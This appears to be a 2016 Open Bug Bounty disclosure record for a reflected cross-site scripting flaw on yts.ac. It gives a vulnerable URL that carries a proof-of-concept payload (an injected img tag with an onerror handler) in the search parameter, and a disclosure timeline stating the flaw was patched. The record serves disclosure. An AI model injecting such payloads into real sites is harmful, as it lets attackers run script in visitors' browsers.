yts.ac XSS vulnerability

2016-09-26T01:50:00
ID OBB:183595
Type openbugbounty
Reporter WhitePacket
Modified 2016-10-17T20:30:00

Description

Vulnerable URL:
http://yts.ac/browse-movies/?search_download=all&search;_query=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt(/XSSPOSED/)%3E&search;_order=latest&search;_category=all&search;_rating=all
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 29259
VIP website status:| Yes
Check yts.ac SSL connection:| (Grade: A+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 26 September, 2016 01:50 GMT
Generic security notifications sent to website owner| 26 September, 2016 01:52 GMT
Vulnerability details disclosed by researcher| 17 October, 2016 02:13 GMT
Vulnerability patched by the website owner| 17 October, 2016 20:30 GMT